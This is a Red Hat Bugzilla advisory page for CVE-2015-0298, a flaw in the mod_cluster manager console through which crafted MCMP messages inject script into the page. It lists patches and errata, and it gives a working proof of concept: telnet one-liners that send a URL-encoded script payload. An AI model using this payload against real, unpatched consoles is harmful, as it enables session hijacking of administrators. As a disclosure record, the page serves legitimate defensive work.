Bug 1197769 (CVE-2015-0298) - CVE-2015-0298 mod_cluster: JavaScript code injection is possible via MCMP mod_manager messages
Summary: CVE-2015-0298 mod_cluster: JavaScript code injection is possible via MCMP mod...
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2015-0298
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact: Michal Karm Babacek
URL:
Whiteboard:
Depends On: 1197186 1238180 1245614 1260483 1260484
Blocks: 1197776 1254231
TreeView+ depends on / blocked
 
Reported: 2015-03-02 15:01 UTC by Vasyl Kaigorodov
Modified: 2019-09-29 13:29 UTC (History)
57 users (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed: 2019-06-08 02:39:19 UTC
Embargoed:

Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Bugzilla 1326179 0 unspecified CLOSED (6.4.z) It is possible to inject JavaScript into mod_cluster manager console via MCMP messages 2021-02-22 00:41:40 UTC
Red Hat Product Errata RHSA-2015:1641 0 normal SHIPPED_LIVE Important: Red Hat JBoss Web Server 2.1.0 security update 2015-08-18 22:48:48 UTC
Red Hat Product Errata RHSA-2015:1642 0 normal SHIPPED_LIVE Important: Red Hat JBoss Web Server 2.1.0 security update 2015-08-18 22:51:12 UTC

Internal Links: 1326179

Description Vasyl Kaigorodov 2015-03-02 15:01:44 UTC 
Michal Babacek from Red Hat discovered [1] that it's possible to iject arbitrary JavaScript code in the mod_manager web interface using MCMP messages:

- With mod_cluster Manager running on 127.0.0.1:6666 run the commands below:
"""
  { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666
  { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666
"""
- Open http://localhost:6666/mod_cluster_manager and you'll see a JavaScript pop-up Alert being executed.

Proposed (intrusive) patch and further discussion is available at [1].

[1]: https://issues.jboss.org/browse/MODCLUSTER-453
Comment 1 Michal Karm Babacek 2015-03-03 11:05:15 UTC 
Ad Comment 0: 
[1] https://issues.jboss.org/secure/attachment/12388047/12388047_MODCLUSTER-453_master-better_one.patch
Comment 2 Timothy Walsh 2015-05-05 01:49:27 UTC 
removing embargo due to patch has been included in EAP 6.4.
Comment 8 errata-xmlrpc 2015-08-18 18:49:08 UTC 
This issue has been addressed in the following products:

  JBoss Web Server 2.1.0

Via RHSA-2015:1641 https://rhn.redhat.com/errata/RHSA-2015-1641.html
Comment 10 errata-xmlrpc 2015-08-18 18:51:25 UTC 
This issue has been addressed in the following products:

  JBEWS 2 for RHEL 6
  JBEWS 2 for RHEL 7
  JBEWS 2 for RHEL 5

Via RHSA-2015:1642 https://rhn.redhat.com/errata/RHSA-2015-1642.html
Note You need to log in before you can comment on or make changes to this bug.